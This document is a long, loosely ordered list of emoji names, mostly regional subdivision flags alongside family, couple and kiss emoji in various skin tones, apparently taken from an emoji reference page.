🏴 Flag for Niutao (TV-NIT)
🏴 Flag for North Pemba (TZ-06)
🏴 Flag for New Taipei (TW-NWT)
🏴 Flag for Iringa (TZ-04)
🏴 Flag for Kagera (TZ-05)
🏴 Flag for Yunlin (TW-YUN)
🏴 Flag for Lienchiang (TW-LIE)
🏴 Flag for Nanumanga (TV-NMG)
🏴 Flag for Dar es Salaam (TZ-02)
🏴 Flag for Nanumea (TV-NMA)
🏴 Flag for Taitung (TW-TTT)
🏴 Flag for Nantou (TW-NAN)
🏴 Flag for Chiayi (TW-CYQ)
🏴 Flag for Arusha (TZ-01)
🏴 Flag for Hualien (TW-HUA)
🏴 Flag for Chiayi County (TW-CYI)
🏴 Flag for Taichung (TW-TXG)
🏴 Flag for Keelung (TW-KEE)
🏴 Flag for Miaoli (TW-MIA)
🏴 Flag for Crimea (UA-43)
🏴 Flag for Lindi (TZ-12)
🏴 Flag for Manyara (TZ-26)
🏴 Flag for Luhanshchyna (UA-09)
🏴 Flag for Rukwa (TZ-20)
🏴 Flag for Dnipropetrovshchyna (UA-12)
🏴 Flag for Volyn (UA-07)
🏴 Flag for Shinyanga (TZ-22)
🏴 Flag for Vinnychchyna (UA-05)
🏴 Flag for Ruvuma (TZ-21)
🏴 Flag for Katavi (TZ-28)
🏴 Flag for Zaporizhzhya (UA-23)
🏴 Flag for Kyivshchyna (UA-32)
🏴 Flag for Singida (TZ-23)
🏴 Flag for Tabora (TZ-24)
🏴 Flag for Mara (TZ-13)
🏴 Flag for Geita (TZ-27)
🏴 Flag for Simiyu (TZ-30)
🏴 Flag for Mykolayivschyna (UA-48)
🏴 Flag for Kirovohradschyna (UA-35)
🏴 Flag for Rivnenshchyna (UA-56)
🏴 Flag for Poltavshchyna (UA-53)
🏴 Flag for Mbeya (TZ-14)
🏴 Flag for Mwanza (TZ-18)
🏴 Flag for Zakarpattia (UA-21)
🏴 Flag for South Pemba (TZ-10)
🏴 Flag for Pwani (TZ-19)
🏴 Flag for Mtwara (TZ-17)
🏴 Flag for Sevastopol (UA-40)
🏴 Flag for Odeshchyna (UA-51)
🏴 Flag for Lvivshchyna (UA-46)
🏴 Flag for Donechchyna (UA-14)
🏴 Flag for Prykarpattia (UA-26)
🏴 Flag for Zanzibar Urban/West (TZ-15)
🏴 Flag for Morogoro (TZ-16)
🏴 Flag for Njombe (TZ-29)
🏴 Flag for Chernivtsi Oblast (UA-77)
🏴 Flag for Palmyra Atoll (UM-95)
🏴 Flag for Kansas (US-KS)
👨🏽👨🏽👦🏽👶🏽 Family - Man: Medium Skin Tone, Man: Medium Skin Tone, Boy: Medium Skin Tone, Baby: Medium Skin Tone
🏴 Flag for Arizona (US-AZ)
🏴 Flag for Johnston Atoll (UM-67)
🏴 Flag for Chernihivshchyna (UA-74)
🏴 Flag for Howland Island (UM-84)
🏴 Flag for Georgia (US-GA)
🏴 Flag for Hawaii (US-HI)
🏴 Flag for Midway Atoll (UM-71)
🏴 Flag for American Samoa (US-AS)
🏴 Flag for Connecticut (US-CT)
🏴 Flag for Iowa (US-IA)
🏴 Flag for Ternopilshchyna (UA-61)
🏴 Flag for Northern (UG-N)
🏴 Flag for Guam (US-GU)
🏴 Flag for Baker Island (UM-81)
🏴 Flag for Eastern (UG-E)
🏴 Flag for Khersonshchyna (UA-65)
🏴 Flag for Sumshchyna (UA-59)
🏴 Flag for Indiana (US-IN)
🏴 Flag for Arkansas (US-AR)
🏴 Flag for Delaware (US-DE)
🏴 Flag for Kharkivshchyna (UA-63)
🏴 Flag for Alabama (US-AL)
🏴 Flag for Western (UG-W)
🏴 Flag for Khmelnychchyna (UA-68)
🏴 Flag for Navassa Island (UM-76)
🏴 Flag for Jarvis Island (UM-86)
🏴 Flag for Idaho (US-ID)
🏴 Flag for Kingman Reef (UM-89)
🏴 Flag for Florida (US-FL)
🏴 Flag for Wake Island (UM-79)
🏴 Flag for Illinois (US-IL)
🏴 Flag for Washington DC (US-DC)
🏴 Flag for Cherkashchyna (UA-71)
🏴 Flag for New York (US-NY)
👨🏾👨🏾👦🏾👶🏾 Family - Man: Medium-Dark Skin Tone, Man: Medium-Dark Skin Tone, Boy: Medium-Dark Skin Tone, Baby: Medium-Dark Skin Tone
🏴 Flag for North Carolina (US-NC)
🏴 Flag for Mississippi (US-MS)
🏴 Flag for Massachusetts (US-MA)
🏴 Flag for Nevada (US-NV)
🏴 Flag for Wisconsin (US-WI)
🏴 Flag for Maryland (US-MD)
🏴 Flag for New Mexico (US-NM)
🏴 Flag for Puerto Rico (US-PR)
🏴 Flag for U.S. Outlying Islands (US-UM)
🏴 Flag for Wyoming (US-WY)
🏴 Flag for Ohio (US-OH)
🏴 Flag for Kentucky (US-KY)
🏴 Flag for New Jersey (US-NJ)
🏴 Flag for Oregon (US-OR)
🏴 Flag for Michigan (US-MI)
🏴 Flag for U.S. Virgin Islands (US-VI)
🏴 Flag for Missouri (US-MO)
🏴 Flag for Pennsylvania (US-PA)
🏴 Flag for Virginia (US-VA)
🏴 Flag for Artigas (UY-AR)
🏴 Flag for Canelones (UY-CA)
🏴 Flag for Washington (US-WA)
🏴 Flag for South Carolina (US-SC)
🏴 Flag for Maine (US-ME)
🏴 Flag for Louisiana (US-LA)
🏴 Flag for Minnesota (US-MN)
🏴 Flag for Rhode Island (US-RI)
🏴 Flag for West Virginia (US-WV)
🏴 Flag for Texas (US-TX)
🏴 Flag for Utah (US-UT)
🏴 Flag for Oklahoma (US-OK)
🏴 Flag for New Hampshire (US-NH)
🏴 Flag for Samarqand (UZ-SA)
🏴 Flag for Maldonado (UY-MA)
🏴 Flag for Namangan (UZ-NG)
🏴 Flag for Charlotte (VC-01)
🏴 Flag for Salto (UY-SA)
🏴 Flag for Cerro Largo (UY-CL)
🏴 Flag for Tacuarembó (UY-TA)
🏴 Flag for Capital (VE-A)
🏴 Flag for Anzoátegui (VE-B)
🏴 Flag for Saint Andrew (VC-02)
🏴 Flag for Soriano (UY-SO)
🏴 Flag for Rocha (UY-RO)
🏴 Flag for Saint David (VC-03)
🏴 Flag for San José (UY-SJ)
🏴 Flag for Florida (UY-FD)
🏴 Flag for Colonia (UY-CO)
🏴 Flag for Flores (UY-FS)
🏴 Flag for Xorazm (UZ-XO)
🏴 Flag for Durazno (UY-DU)
🏴 Flag for Andijan (UZ-AN)
🏴 Flag for Aragua (VE-D)
🏴 Flag for Sirdaryo (UZ-SI)
🏴 Flag for Paysandú (UY-PA)
🏴 Flag for Grenadines (VC-06)
🏴 Flag for Rivera (UY-RV)
🏴 Flag for Lavalleja (UY-LA)
🏴 Flag for Surxondaryo (UZ-SU)
🏴 Flag for Tashkent Province (UZ-TO)
🏴 Flag for Qashqadaryo (UZ-QA)
🏴 Flag for Treinta y Tres (UY-TT)
🏴 Flag for Montevideo (UY-MO)
🏴 Flag for Bukhara (UZ-BU)
🏴 Flag for Fergana (UZ-FA)
🏴 Flag for Karakalpakstan (UZ-QR)
🏴 Flag for Jizzakh (UZ-JI)
🏴 Flag for Río Negro (UY-RN)
🏴 Flag for Tashkent (UZ-TK)
🏴 Flag for Saint Patrick (VC-05)
🏴 Flag for Navoiy (UZ-NW)
🏴 Flag for Lara (VE-K)
🏴 Flag for Nueva Esparta (VE-O)
🏴 Flag for Táchira (VE-S)
🏴 Flag for Bolívar (VE-F)
🏴 Flag for Thanh Hóa (VN-21)
🏴 Flag for Hòa Bình (VN-14)
🏴 Flag for Guárico (VE-J)
🏴 Flag for Cojedes (VE-H)
🏴 Flag for Thừa Thiên–Huế (VN-26)
🏴 Flag for Portuguesa (VE-P)
🏴 Flag for Ninh Bình (VN-18)
🏴 Flag for Sucre (VE-R)
🏴 Flag for Lai Châu (VN-01)
🏴 Flag for Lạng Sơn (VN-09)
🏴 Flag for Miranda (VE-M)
🏴 Flag for Quảng Bình (VN-24)
🏴 Flag for Barinas (VE-E)
🏴 Flag for Monagas (VE-N)
🏴 Flag for Nghệ An (VN-22)
🏴 Flag for Lào Cai (VN-02)
🏴 Flag for Tuyên Quang (VN-07)
🏴 Flag for Sơn La (VN-05)
🏴 Flag for Thái Bình (VN-20)
🏴 Flag for Federal Dependencies (VE-W)
🏴 Flag for Quảng Ngãi (VN-29)
🏴 Flag for Mérida (VE-L)
🏴 Flag for Falcón (VE-I)
🏴 Flag for Cao Bằng (VN-04)
🏴 Flag for Amazonas (VE-Z)
🏴 Flag for Yên Bái (VN-06)
🏴 Flag for Hà Tĩnh (VN-23)
🏴 Flag for Kon Tum (VN-28)
🏴 Flag for Vargas (VE-X)
🏴 Flag for Yaracuy (VE-U)
🏴 Flag for Trujillo (VE-T)
🏴 Flag for Quảng Ninh (VN-13)
🏴 Flag for Hà Giang (VN-03)
🏴 Flag for Quảng Nam (VN-27)
🏴 Flag for Bắc Ninh (VN-56)
🏴 Flag for Ninh Thuận (VN-36)
🏴 Flag for Thái Nguyên (VN-69)
🏴 Flag for Nam Định (VN-67)
🏴 Flag for Lâm Đồng (VN-35)
🏴 Flag for Hải Dương (VN-61)
🏴 Flag for Sóc Trăng (VN-52)
🏴 Flag for Hậu Giang (VN-73)
🏴 Flag for Vĩnh Phúc (VN-70)
🏴 Flag for Bến Tre (VN-50)
🏴 Flag for Bắc Kạn (VN-53)
🏴 Flag for Bắc Giang (VN-54)
🏴 Flag for Đắk Lắk (VN-33)
🏴 Flag for Bình Dương (VN-57)
🏴 Flag for Da Nang (VN-DN)
🏴 Flag for Tiền Giang (VN-46)
🏴 Flag for Bà Rịa–Vũng Tàu (VN-43)
🏴 Flag for Điện Biên (VN-71)
🏴 Flag for Bình Phước (VN-58)
🏴 Flag for Can Tho (VN-CT)
🏴 Flag for Bạc Liêu (VN-55)
🏴 Flag for Phú Yên (VN-32)
🏴 Flag for An Giang (VN-44)
🏴 Flag for Hà Nam (VN-63)
🏴 Flag for Cà Mau (VN-59)
🏴 Flag for Kiên Giang (VN-47)
🏴 Flag for Khánh Hòa (VN-34)
🏴 Flag for Đồng Tháp (VN-45)
🏴 Flag for Đồng Nai (VN-39)
🏴 Flag for Hanoi (VN-HN)
🏴 Flag for Vĩnh Long (VN-49)
🏴 Flag for Phú Thọ (VN-68)
🏴 Flag for Tây Ninh (VN-37)
🏴 Flag for Gia Lai (VN-30)
🏴 Flag for Đắk Nông (VN-72)
🏴 Flag for Bình Thuận (VN-40)
🏴 Flag for Long An (VN-41)
🏴 Flag for Bình Định (VN-31)
🏴 Flag for Uvea (WF-UV)
🏴 Flag for Sa’dah (YE-SD)
🏴 Flag for Abyan (YE-AB)
🏴 Flag for Hajjah (YE-HJ)
🏴 Flag for Malampa (VU-MAP)
🏴 Flag for Atua (WS-AT)
🏴 Flag for Va’a-o-Fonoti (WS-VF)
🏴 Flag for Al Hudaydah (YE-HU)
🏴 Flag for Palauli (WS-PA)
🏴 Flag for Satupa’itea (WS-SA)
🏴 Flag for Dhale (YE-DA)
🏴 Flag for Tombouctou (ML-6)
🏴 Flag for Raymah (YE-RA)
🏴 Flag for Sanma (VU-SAM)
🏴 Flag for Alo (WF-AL)
🏴 Flag for Al Mahrah (YE-MR)
👨🏻👨🏻👧🏻 Family - Man: Light Skin Tone, Man: Light Skin Tone, Girl: Light Skin Tone
🏴 Flag for ’Adan (YE-AD)
🏴 Flag for Shabwah (YE-SH)
🏴 Flag for Tafea (VU-TAE)
🏴 Flag for Amran (YE-AM)
🏴 Flag for Penama (VU-PAM)
🏴 Flag for Al Mahwit (YE-MW)
🏴 Flag for Gaga’emauga (WS-GE)
🏴 Flag for Hadramaut (YE-HD)
🏴 Flag for Aiga-i-le-Tai (WS-AL)
🏴 Flag for Ma’rib (YE-MA)
🏴 Flag for Al Bayda (YE-BA)
🏴 Flag for Haiphong (VN-HP)
🏴 Flag for A’ana (WS-AA)
🏴 Flag for Sigave (WF-SG)
🏴 Flag for Lahij (YE-LA)
🏴 Flag for Shefa (VU-SEE)
🏴 Flag for Ibb (YE-IB)
🏴 Flag for Torba (VU-TOB)
🏴 Flag for Al Jawf (YE-JA)
🏴 Flag for Tuamasaga (WS-TU)
🏴 Flag for Dhamar (YE-DH)
🏴 Flag for Western Cape (ZA-WC)
🏴 Flag for Arkhabil Suqutra (YE-SU)
🏴 Flag for Matabeleland North (ZW-MN)
🏴 Flag for Mashonaland East (ZW-ME)
🏴 Flag for North-Western (ZM-06)
🏴 Flag for Sana’a (YE-SN)
🏴 Flag for Limpopo (ZA-LP)
🏴 Flag for Eastern (ZM-03)
🏴 Flag for Midlands (ZW-MI)
🏴 Flag for Bulawayo (ZW-BU)
🏴 Flag for Northern (ZM-05)
🏴 Flag for Southern (ZM-07)
🏴 Flag for Free State (ZA-FS)
🏴 Flag for Matabeleland South (ZW-MS)
🏴 Flag for Eastern Cape (ZA-EC)
🏴 Flag for Western (ZM-01)
👨🏼👨🏼👧🏼 Family - Man: Medium-Light Skin Tone, Man: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone
🏴 Flag for Copperbelt (ZM-08)
🏴 Flag for North West (ZA-NW)
🏴 Flag for Muchinga (ZM-10)
🏴 Flag for Gauteng (ZA-GT)
🏴 Flag for Lusaka (ZM-09)
🏴 Flag for Central (ZM-02)
🏴 Flag for Northern Cape (ZA-NC)
🏴 Flag for Mpumalanga (ZA-MP)
🏴 Flag for Taiz (YE-TA)
🏴 Flag for KwaZulu-Natal (ZA-NL)
🏴 Flag for Manicaland (ZW-MA)
🏴 Flag for Masvingo (ZW-MV)
🏴 Flag for Luapula (ZM-04)
🏴 Flag for Mashonaland West (ZW-MW)
🏴 Flag for Harare (ZW-HA)
👨🏽👨🏽👧🏽 Family - Man: Medium Skin Tone, Man: Medium Skin Tone, Girl: Medium Skin Tone
👨🏾👨🏾👧🏾 Family - Man: Medium-Dark Skin Tone, Man: Medium-Dark Skin Tone, Girl: Medium-Dark Skin Tone
🏴 Flag for Pays-de-la-Loire (FR-PDL)
🏴 Flag for Klaipėdos Municipality (LT-20)
🏴 Flag for Crete (GR-M)
Tag Latin Small Letter X
🏴 Flag for Mazandaran (IR-21)
🏴 Flag for Primorsky Krai (RU-PRI)
🏴 Flag for Fukushima (JP-07)
🏴 Flag for Manitoba (CA-MB)
👨🏻👨🏻👦🏻👦🏻 Family - Man: Light Skin Tone, Man: Light Skin Tone, Boy: Light Skin Tone, Boy: Light Skin Tone
👩🏻❤️👩🏻 Couple With Heart - Woman: Light Skin Tone, Woman: Light Skin Tone
🏴 Flag for Quebec (CA-QC)
👨👩👶 Family: Man, Woman, Baby
🏴 Flag for Kavango East (NA-KE)
🏴 Flag for San Luis Potosí (MX-SLP)
🏴 Flag for Lääne-Viru (EE-59)
🏴 Flag for Bong (LR-BG)
🏴 Flag for Deir al-Balah (PS-DEB)
👨🏿👨🏿👧🏿 Family - Man: Dark Skin Tone, Man: Dark Skin Tone, Girl: Dark Skin Tone
🏴 Flag for Saint Thomas (JM-03)
🏴 Flag for Kayangel (PW-100)
🏴 Flag for Pool (CG-12)
👨❤️👨🏾 Couple With Heart - Man, Man: Medium-Dark Skin Tone
🏴 Flag for Balearic Islands (ES-IB)
👩👨👦 Family: Woman, Man, Boy
🏴 Flag for Uusimaa (FI-18)
👨🏻👩🏻👦🏻👧🏻 Family - Man: Light Skin Tone, Woman: Light Skin Tone, Boy: Light Skin Tone, Girl: Light Skin Tone
🏴 Flag for Ceará (BR-CE)
👨👩👦👶 Family: Man, Woman, Boy, Baby
👨🏻👨🏻👧🏻👦🏻 Family - Man: Light Skin Tone, Man: Light Skin Tone, Girl: Light Skin Tone, Boy: Light Skin Tone
🏴 Flag for Demir Hisar (MK-25)
🏴 Flag for Antofagasta (CL-AN)
🏴 Flag for Christ Church (BB-01)
🏴 Flag for Harju (EE-37)
👨🏿❤️💋👩🏽 Kiss - Man: Dark Skin Tone, Woman: Medium Skin Tone
🏴 Flag for Yaren (NR-14)
👩❤️👩🏻 Couple With Heart - Woman, Woman: Light Skin Tone
🏴 Flag for Selangor (MY-10)
👨🏼👨🏼👧🏼👦🏼 Family - Man: Medium-Light Skin Tone, Man: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone, Boy: Medium-Light Skin Tone
🏴 Flag for Apurímac (PE-APU)
👩👨👦👧 Family: Woman, Man, Boy, Girl
👨🏿👩🏿👧🏿 Family - Man: Dark Skin Tone, Woman: Dark Skin Tone, Girl: Dark Skin Tone
🏴 Flag for Abkhazia (GE-AB)
🏴 Flag for Schellenberg (LI-08)
🏴 Flag for Düzce (TR-81)
👩🏾👧🏾👧🏾 Family - Woman: Medium-Dark Skin Tone, Girl: Medium-Dark Skin Tone, Girl: Medium-Dark Skin Tone
👩👨👶👦 Family: Woman, Man, Baby, Boy
🏴 Flag for Sonora (MX-SON)
🏴 Flag for Sassandra-Marahoué (CI-SM)
🏴 Flag for Arequipa (PE-ARE)
👩🏽❤️👩🏼 Couple With Heart - Woman: Medium Skin Tone, Woman: Medium-Light Skin Tone
🏴 Flag for Bouenza (CG-11)
🏴 Flag for Saint Catherine (JM-14)
🏴 Flag for Škofja Loka (SI-122)
👩🏻❤️💋👨🏼 Kiss - Woman: Light Skin Tone, Man: Medium-Light Skin Tone
🏴 Flag for Hsinchu (TW-HSZ)
👩🏼👧🏼👦🏼 Family - Woman: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone, Boy: Medium-Light Skin Tone
🏴 Flag for Southern (LK-3)
👨❤️💋👨🏼 Kiss - Man, Man: Medium-Light Skin Tone
👨🏽👨🏽👧🏽👦🏽 Family - Man: Medium Skin Tone, Man: Medium Skin Tone, Girl: Medium Skin Tone, Boy: Medium Skin Tone
🏴 Flag for León (NI-LE)
🏴 Flag for Varaždin (HR-05)
🏴 Flag for Antioquia (CO-ANT)
🏴 Flag for Sainte-Dévote Chapel (MC-SD)
🏴 Flag for Plasnica (MK-61)
👨🏾❤️👨🏻 Couple With Heart - Man: Medium-Dark Skin Tone, Man: Light Skin Tone
🏴 Flag for West Greece (GR-G)
🏴 Flag for North Province (MV-NO)
👨❤️👩🏻 Couple With Heart - Man, Woman: Light Skin Tone
🏴 Flag for Apure (VE-C)
☿️ Mercury
🏴 Flag for Montana (US-MT)
👩🏼❤️👨🏾 Couple With Heart - Woman: Medium-Light Skin Tone, Man: Medium-Dark Skin Tone
👨🏾👨🏾👧🏾👦🏾 Family - Man: Medium-Dark Skin Tone, Man: Medium-Dark Skin Tone, Girl: Medium-Dark Skin Tone, Boy: Medium-Dark Skin Tone
🏴 Flag for Esmeraldas (EC-E)
🏴 Flag for Béchar (DZ-08)
🏴 Flag for North Holland (NL-NH)
🏴 Flag for St. Barthélemy (FR-BL)
🏴 Flag for Ouaka (CF-UK)
🏴 Flag for Red Sea (SD-RS)
🏴 Flag for Tabasco (MX-TAB)
🏴 Flag for Macau SAR China (CN-92)
🏴 Flag for Eger (HU-EG)
🏴 Flag for North Ossetia-Alania (RU-SE)
🏴 Flag for Équateur (CD-EQ)
👨🏿👨🏿👧🏿👦🏿 Family - Man: Dark Skin Tone, Man: Dark Skin Tone, Girl: Dark Skin Tone, Boy: Dark Skin Tone
🏴 Flag for Basque Country (ES-PV)
👨🏽❤️💋👨🏻 Kiss - Man: Medium Skin Tone, Man: Light Skin Tone
🏴 Flag for Gafsa (TN-71)
🏴 Flag for Tavastia Proper (FI-06)
🏴 Flag for Razavi Khorasan (IR-30)
🏴 Flag for Dobje (SI-154)
👨🏼❤️💋👨🏻 Kiss - Man: Medium-Light Skin Tone, Man: Light Skin Tone
🏴 Flag for Retalhuleu (GT-RE)
🏴 Flag for Line Islands (KI-L)
🏴 Flag for West Azarbaijan (IR-02)
🏴 Flag for Nariño (CO-NAR)
🏴 Flag for Mashonaland Central (ZW-MC)
👨🏻❤️👨🏻 Couple With Heart - Man: Light Skin Tone, Man: Light Skin Tone
🏴 Flag for Emilia-Romagna (IT-45)
🏴 Flag for Valencian Community (ES-VC)
🏴 Flag for Samut Songkhram (TH-75)
🏴 Flag for Île-de-France (FR-IDF)
🏴 Flag for Maseru (LS-A)
🏴 Flag for Marsabit (KE-25)
🏴 Flag for Adrar (DZ-01)
🏴 Flag for Usulután (SV-US)
🏴 Flag for Mazsalaca (LV-060)
👩🏻❤️💋👩🏾 Kiss - Woman: Light Skin Tone, Woman: Medium-Dark Skin Tone
👨🏾👦🏾👦🏾 Family - Man: Medium-Dark Skin Tone, Boy: Medium-Dark Skin Tone, Boy: Medium-Dark Skin Tone
🏴 Flag for Chaiyaphum (TH-36)
🏴 Flag for Central Visayas (PH-07)
🏴 Flag for Chumphon (TH-86)
🏴 Flag for Zanzan (CI-ZZ)
🏴 Flag for Castile and León (ES-CL)
👨🏻👨🏻👧🏻👧🏻 Family - Man: Light Skin Tone, Man: Light Skin Tone, Girl: Light Skin Tone, Girl: Light Skin Tone
🏴 Flag for Al Bahah (SA-11)
🏴 Flag for Sint Eustatius (BQ-SE)
🏴 Flag for Åland Islands (FI-01)
🏴 Flag for Heredia (CR-H)
🏴 Flag for Kütahya (TR-43)
🏴 Flag for Vaisigano (WS-VS)
👨🏿❤️💋👩🏼 Kiss - Man: Dark Skin Tone, Woman: Medium-Light Skin Tone
🏴 Flag for Kranj (SI-052)
🏴 Flag for Zulia (VE-V)
👩🏽❤️💋👨🏼 Kiss - Woman: Medium Skin Tone, Man: Medium-Light Skin Tone
🏴 Flag for Capellen (LU-CA)
👩🏽❤️👩🏾 Couple With Heart - Woman: Medium Skin Tone, Woman: Medium-Dark Skin Tone
👨🏼👨🏼👧🏼👧🏼 Family - Man: Medium-Light Skin Tone, Man: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone
🏴 Flag for East Berbice-Corentyne (GY-EB)
🏴 Flag for Lopburi (TH-16)
🏴 Flag for Luqa (MT-25)
👨🏻❤️👨🏼 Couple With Heart - Man: Light Skin Tone, Man: Medium-Light Skin Tone
👨🏽👨🏽👧🏽👧🏽 Family - Man: Medium Skin Tone, Man: Medium Skin Tone, Girl: Medium Skin Tone, Girl: Medium Skin Tone
👩🏻❤️👩🏽 Couple With Heart - Woman: Light Skin Tone, Woman: Medium Skin Tone
🏴 Flag for Baja California Sur (MX-BCS)
🏴 Flag for Beni Suef (EG-BNS)
🏴 Flag for Phatthalung (TH-93)
🏴 Flag for Tanga (TZ-25)
🏴 Flag for Oriental (MA-04)
👨🏾👨🏾👧🏾👧🏾 Family - Man: Medium-Dark Skin Tone, Man: Medium-Dark Skin Tone, Girl: Medium-Dark Skin Tone, Girl: Medium-Dark Skin Tone
👨🏿👩🏿👶🏿 Family - Man: Dark Skin Tone, Woman: Dark Skin Tone, Baby: Dark Skin Tone
🏴 Flag for Gorenja Vas–Poljane (SI-027)
🏴 Flag for Sangre Grande (TT-SGE)
🏴 Flag for Koknese (LV-046)
🏴 Flag for Odranci (SI-086)
🏴 Flag for Nelson (NZ-NSN)
🏴 Flag for Szabolcs-Szatmár-Bereg (HU-SZ)
👩🏾❤️💋👨🏽 Kiss - Woman: Medium-Dark Skin Tone, Man: Medium Skin Tone
🏴 Flag for Sveti Jurij v Slovenskih Goricah (SI-210)
߷ NKo Symbol Gbakurunen
🏴 Flag for Delta (NG-DE)
🏴 Flag for Căușeni (MD-CS)
👩🏽👧🏽👦🏽 Family - Woman: Medium Skin Tone, Girl: Medium Skin Tone, Boy: Medium Skin Tone
🏴 Flag for Isla de la Juventud (CU-99)
🏴 Flag for Svay Rieng (KH-20)
🏴 Flag for Hadjer-Lamis (TD-HL)
🏴 Flag for Gifu (JP-21)
🏴 Flag for Jelgava Municipality (LV-041)
🏴 Flag for Federally Administered Tribal Areas (PK-TA)
🏴 Flag for Xewkija (MT-62)
🏴 Flag for Guidimaka (MR-10)
🏴 Flag for Aračinovo (MK-02)
🏴 Flag for Log–Dragomer (SI-208)
🏴 Flag for Šmartno ob Paki (SI-125)
🏴 Flag for Capital District (CO-DC)
🏴 Flag for Ventspils Municipality (LV-106)
🏴 Flag for South Central Province (MV-SC)
🏴 Flag for Assam (IN-AS)
🏴 Flag for Alytus Municipality (LT-02)
🏴 Flag for Hưng Yên (VN-66)
👨🏻👨🏻👧🏻👶🏻 Family - Man: Light Skin Tone, Man: Light Skin Tone, Girl: Light Skin Tone, Baby: Light Skin Tone
👨🏼👨🏼👧🏼👶🏼 Family - Man: Medium-Light Skin Tone, Man: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone, Baby: Medium-Light Skin Tone
🏴 Flag for San Marcos (GT-SM)
👨🏼👨🏼👦🏼👦🏼 Family - Man: Medium-Light Skin Tone, Man: Medium-Light Skin Tone, Boy: Medium-Light Skin Tone, Boy: Medium-Light Skin Tone
🏴 Flag for Schleswig-Holstein (DE-SH)
👨👨👶👧 Family: Man, Man, Baby, Girl
️ Variation Selector-16
👨🏽👨🏽👧🏽👶🏽 Family - Man: Medium Skin Tone, Man: Medium Skin Tone, Girl: Medium Skin Tone, Baby: Medium Skin Tone
👨🏾👨🏾👧🏾👶🏾 Family - Man: Medium-Dark Skin Tone, Man: Medium-Dark Skin Tone, Girl: Medium-Dark Skin Tone, Baby: Medium-Dark Skin Tone
👨🏿👨🏿👧🏿👶🏿 Family - Man: Dark Skin Tone, Man: Dark Skin Tone, Girl: Dark Skin Tone, Baby: Dark Skin Tone
👨🏻👨🏻👶🏻 Family - Man: Light Skin Tone, Man: Light Skin Tone, Baby: Light Skin Tone
👨🏼👨🏼👶🏼 Family - Man: Medium-Light Skin Tone, Man: Medium-Light Skin Tone, Baby: Medium-Light Skin Tone
👨🏽👨🏽👶🏽 Family - Man: Medium Skin Tone, Man: Medium Skin Tone, Baby: Medium Skin Tone
👨🏾👨🏾👶🏾 Family - Man: Medium-Dark Skin Tone, Man: Medium-Dark Skin Tone, Baby: Medium-Dark Skin Tone
👨🏿👨🏿👶🏿 Family - Man: Dark Skin Tone, Man: Dark Skin Tone, Baby: Dark Skin Tone
👩❤️👨🏿 Couple With Heart - Woman, Man: Dark Skin Tone
🏴 Flag for Cantabria (ES-CB)
🏴 Flag for Unity (SS-UY)
👩🏼👶🏼👦🏼 Family - Woman: Medium-Light Skin Tone, Baby: Medium-Light Skin Tone, Boy: Medium-Light Skin Tone
👩🏽👶🏽👦🏽 Family - Woman: Medium Skin Tone, Baby: Medium Skin Tone, Boy: Medium Skin Tone
👩🏾👶🏾👦🏾 Family - Woman: Medium-Dark Skin Tone, Baby: Medium-Dark Skin Tone, Boy: Medium-Dark Skin Tone
👩🏿👶🏿👦🏿 Family - Woman: Dark Skin Tone, Baby: Dark Skin Tone, Boy: Dark Skin Tone
👩🏻👶🏻👧🏻 Family - Woman: Light Skin Tone, Baby: Light Skin Tone, Girl: Light Skin Tone
👩🏼👶🏼👧🏼 Family - Woman: Medium-Light Skin Tone, Baby: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone
👩🏽👶🏽👧🏽 Family - Woman: Medium Skin Tone, Baby: Medium Skin Tone, Girl: Medium Skin Tone
👩🏾👶🏾👧🏾 Family - Woman: Medium-Dark Skin Tone, Baby: Medium-Dark Skin Tone, Girl: Medium-Dark Skin Tone
👩🏽👶🏽👶🏽 Family - Woman: Medium Skin Tone, Baby: Medium Skin Tone, Baby: Medium Skin Tone
👩🏾👶🏾👶🏾 Family - Woman: Medium-Dark Skin Tone, Baby: Medium-Dark Skin Tone, Baby: Medium-Dark Skin Tone
👩🏿👶🏿👶🏿 Family - Woman: Dark Skin Tone, Baby: Dark Skin Tone, Baby: Dark Skin Tone
👩🏻👨🏻👦🏻 Family - Woman: Light Skin Tone, Man: Light Skin Tone, Boy: Light Skin Tone
👩🏼👨🏼👦🏼 Family - Woman: Medium-Light Skin Tone, Man: Medium-Light Skin Tone, Boy: Medium-Light Skin Tone
👩🏽👨🏽👦🏽 Family - Woman: Medium Skin Tone, Man: Medium Skin Tone, Boy: Medium Skin Tone
👩🏾👨🏾👦🏾 Family - Woman: Medium-Dark Skin Tone, Man: Medium-Dark Skin Tone, Boy: Medium-Dark Skin Tone
👩🏿👨🏿👦🏿 Family - Woman: Dark Skin Tone, Man: Dark Skin Tone, Boy: Dark Skin Tone
👩🏻👨🏻👦🏻👦🏻 Family - Woman: Light Skin Tone, Man: Light Skin Tone, Boy: Light Skin Tone, Boy: Light Skin Tone
👩🏼👶🏼👶🏼 Family - Woman: Medium-Light Skin Tone, Baby: Medium-Light Skin Tone, Baby: Medium-Light Skin Tone
👩🏼👨🏼👦🏼👦🏼 Family - Woman: Medium-Light Skin Tone, Man: Medium-Light Skin Tone, Boy: Medium-Light Skin Tone, Boy: Medium-Light Skin Tone
👩🏽👨🏽👦🏽👦🏽 Family - Woman: Medium Skin Tone, Man: Medium Skin Tone, Boy: Medium Skin Tone, Boy: Medium Skin Tone
👩🏾👨🏾👦🏾👦🏾 Family - Woman: Medium-Dark Skin Tone, Man: Medium-Dark Skin Tone, Boy: Medium-Dark Skin Tone, Boy: Medium-Dark Skin Tone
👩🏿👨🏿👦🏿👦🏿 Family - Woman: Dark Skin Tone, Man: Dark Skin Tone, Boy: Dark Skin Tone, Boy: Dark Skin Tone
👩🏽👨🏽👦🏽👧🏽 Family - Woman: Medium Skin Tone, Man: Medium Skin Tone, Boy: Medium Skin Tone, Girl: Medium Skin Tone
👩🏾👨🏾👦🏾👧🏾 Family - Woman: Medium-Dark Skin Tone, Man: Medium-Dark Skin Tone, Boy: Medium-Dark Skin Tone, Girl: Medium-Dark Skin Tone
👩🏿👨🏿👦🏿👧🏿 Family - Woman: Dark Skin Tone, Man: Dark Skin Tone, Boy: Dark Skin Tone, Girl: Dark Skin Tone
👩🏼👨🏼👦🏼👶🏼 Family - Woman: Medium-Light Skin Tone, Man: Medium-Light Skin Tone, Boy: Medium-Light Skin Tone, Baby: Medium-Light Skin Tone
